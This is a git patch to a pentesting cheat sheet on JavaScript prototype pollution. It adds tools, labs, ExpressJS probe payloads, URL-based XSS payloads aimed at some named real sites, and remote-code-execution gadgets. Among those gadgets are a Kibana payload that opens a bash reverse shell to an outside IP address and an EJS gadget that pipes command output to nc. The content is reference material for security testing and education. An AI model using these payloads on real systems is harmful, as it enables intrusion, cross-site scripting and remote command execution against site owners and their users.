From ccccb34c61a1fe51c9b15fed1e0053fa856841e8 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 18 Oct 2023 18:46:41 +0200 Subject: [PATCH] Prototype Pollution Update --- Prototype Pollution/README.md | 123 +++++++++++++++++++++++++++++++--- 1 file changed, 112 insertions(+), 11 deletions(-) diff --git a/Prototype Pollution/README.md b/Prototype Pollution/README.md index b72a4db..5770e1b 100644 --- a/Prototype Pollution/README.md +++ b/Prototype Pollution/README.md @@ -9,26 +9,45 @@ * [Labs](#labs) * [Exploit](#exploit) * [Examples](#examples) - * [Prototype pollution via JSON input](#prototype-pollution-via-json-input) - * [Prototype pollution payloads](#prototype-pollution-payloads) + * [Manual Testing](#manual-testing) + * [Prototype Pollution via JSON input](#prototype-pollution-via-json-input) + * [Prototype Pollution in URL](#prototype-pollution-in-url) + * [Prototype Pollution Payloads](#prototype-pollution-payloads) + * [Prototype Pollution Gadgets](#prototype-pollution-gadgets) * [References](#references) ## Tools * [yeswehack/pp-finder](https://github.com/yeswehack/pp-finder) - Help you find gadget for prototype pollution exploitation - +* [yuske/silent-spring](https://github.com/yuske/silent-spring) - Prototype Pollution Leads to Remote Code Execution in Node.js +* [yuske/server-side-prototype-pollution](https://github.com/yuske/server-side-prototype-pollution) - Server-Side Prototype Pollution gadgets in Node.js core code and 3rd party NPM packages +* [BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution) - Prototype Pollution and useful Script Gadgets +* [portswigger/server-side-prototype-pollution](https://github.com/portswigger/server-side-prototype-pollution) - Burp Suite Extension detectiong Prototype Pollution vulnerabilities +* [msrkp/PPScan](https://github.com/msrkp/PPScan) ## Labs * [YesWeHack Dojo - Prototype Pollution](https://dojo-yeswehack.com/XSS/Training/Prototype-Pollution) -* [PortSwigger - Prototype pollution](https://portswigger.net/web-security/all-labs#prototype-pollution) +* [PortSwigger - Prototype Pollution](https://portswigger.net/web-security/all-labs#prototype-pollution) ## Exploit In JavaScript, prototypes are what allow objects to inherit features from other objects. If an attacker is able to add or modify properties of `Object.prototype`, they can essentially affect all objects that inherit from that prototype, potentially leading to various kinds of security risks. +```js +var myDog = new Dog(); + +// Points to the function "Dog" +myDog.constructor; + +// Points to the class definition of "Dog" +myDog.constructor.prototype; +myDog.__proto__; +myDog["__proto__"]; +``` + ### Examples @@ -44,9 +63,21 @@ In JavaScript, prototypes are what allow objects to inherit features from other ``` -### Prototype pollution via JSON input +### Manual Testing + +* ExpressJS: `{ "__proto__":{"parameterLimit":1}}` + 2 parameters in GET request, at least 1 must be reflected in the response. +* ExpressJS: `{ "__proto__":{"ignoreQueryPrefix":true}}` + `??foo=bar` +* ExpressJS: `{ "__proto__":{"allowDots":true}}` + `?foo.bar=baz` +* Change the padding of a JSON response: `{ "__proto__":{"json spaces":" "}}` + `{"foo":"bar"}`, the server should return `{"foo": "bar"}` +* Modify CORS header responses: `{ "__proto__":{"exposedHeaders":["foo"]}}`, the server should return the header `Access-Control-Expose-Headers`. +* Change the status code: `{ "__proto__":{"status":510}}` + + +### Prototype Pollution via JSON input + +You can access the prototype of any object via the magic property `__proto__`. +The `JSON.parse()` function in JavaScript is used to parse a JSON string and convert it into a JavaScript object. Typically it is a sink function where prototype pollution can happen. -You can access the prototype of any object via the magic property `__proto__`. ```js { @@ -56,8 +87,56 @@ You can access the prototype of any object via the magic property `__proto__`. } ``` +Asynchronous payload for NodeJS. -### Prototype pollution payloads +```js +{ + "__proto__": { + "argv0":"node", + "shell":"node", + "NODE_OPTIONS":"--inspect=payload\"\".oastify\"\".com" + } +} +``` + + +### Prototype Pollution in URL + +Example of Prototype Pollution payloads found in the wild. + +```ps1 +https://victim.com/#a=b&__proto__[admin]=1 +https://example.com/#__proto__[xxx]=alert(1) +http://server/servicedesk/customer/user/signup?__proto__.preventDefault.__proto__.handleObj.__proto__.delegateTarget=%3Cimg/src/onerror=alert(1)%3E +https://www.apple.com/shop/buy-watch/apple-watch?__proto__[src]=image&__proto__[onerror]=alert(1) +https://www.apple.com/shop/buy-watch/apple-watch?a[constructor][prototype]=image&a[constructor][prototype][onerror]=alert(1) +``` + + +### Prototype Pollution Exploitation + +Depending if the prototype pollution is executed client (CSPP) or server side (SSPP), the impact will vary. + +* Remote Command Execution: [RCE in Kibana (CVE-2019-7609)](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/) + ```js + .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') + .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ') + ``` +* Remote Command Execution: [RCE using EJS gadgets](https://mizu.re/post/ejs-server-side-prototype-pollution-gadgets-to-rce) + ```js + { + "__proto__": { + "client": 1, + "escapeFunction": "JSON.stringify; process.mainModule.require('child_process').exec('id | nc localhost 4444')" + } + } + ``` +* Reflected XSS: [Reflected XSS on www.hackerone.com via Wistia embed code - #986386](https://hackerone.com/reports/986386) +* Client-side bypass: [Prototype pollution – and bypassing client-side HTML sanitizers](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) +* Deny of Service + + +### Prototype Pollution Payloads ```js Object.__proto__["evilProperty"]="evilPayload" @@ -65,14 +144,36 @@ Object.__proto__.evilProperty="evilPayload" Object.constructor.prototype.evilProperty="evilPayload" Object.constructor["prototype"]["evilProperty"]="evilPayload" {"__proto__": {"evilProperty": "evilPayload"}} +{"__proto__.name":"test"} +x[__proto__][abaeead] = abaeead +x.__proto__.edcbcab = edcbcab +__proto__[eedffcb] = eedffcb +__proto__.baaebfc = baaebfc +?__proto__[test]=test ``` +### Prototype Pollution Gadgets + +A "gadget" in the context of vulnerabilities typically refers to a piece of code or functionality that can be exploited or leveraged during an attack. When we talk about a "prototype pollution gadget," we're referring to a specific code path, function, or feature of an application that is susceptible to or can be exploited through a prototype pollution attack. + +Either create your own gadget using part of the source with [yeswehack/pp-finder](https://github.com/yeswehack/pp-finder), or try to use already discovered gadgets [yuske/server-side-prototype-pollution](https://github.com/yuske/server-side-prototype-pollution) / [BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution). + + ## References -* [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/) -* [Prototype Pollution and Where to Find Them - BitK & SakiiR - AUGUST 14, 2023](https://youtu.be/mwpH9DF_RDA) -* [Prototype Pollution - PortSwigger](https://portswigger.net/web-security/prototype-pollution) * [A Pentester’s Guide to Prototype Pollution Attacks - HARSH BOTHRA - JAN 2, 2023](https://www.cobalt.io/blog/a-pentesters-guide-to-prototype-pollution-attacks) +* [A tale of making internet pollution free - Exploiting Client-Side Prototype Pollution in the wild - s1r1us](https://blog.s1r1us.ninja/research/PP) +* [Detecting Server-Side Prototype Pollution - Daniel Thatcher - February 15, 2023](https://www.intruder.io/research/server-side-prototype-pollution) +* [Exploiting prototype pollution – RCE in Kibana (CVE-2019-7609) - MICHAŁ BENTKOWSKI - October 30, 2019](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/) +* [NodeJS - __proto__ & prototype Pollution - HackTricks](https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution) +* [Prototype Pollution - PortSwigger](https://portswigger.net/web-security/prototype-pollution) * [Prototype pollution - Snyk](https://learn.snyk.io/lessons/prototype-pollution/javascript/) -* [NodeJS - __proto__ & prototype Pollution - HackTricks](https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution) \ No newline at end of file +* [Prototype pollution and bypassing client-side HTML sanitizers - MICHAŁ BENTKOWSKI - August 18, 2020](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) +* [Prototype Pollution and Where to Find Them - BitK & SakiiR - AUGUST 14, 2023](https://youtu.be/mwpH9DF_RDA) +* [Prototype Pollution Attack in NodeJS - Olivier Arteau](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf) +* [Prototype pollution attacks in NodeJS applications - Olivier Arteau - Youtube](https://youtu.be/LUsiFV3dsK8) +* [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov](https://youtu.be/v5dq80S1WF4) +* [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/) +* [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - 15 February 2023](https://portswigger.net/research/server-side-prototype-pollution) +* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M) \ No newline at end of file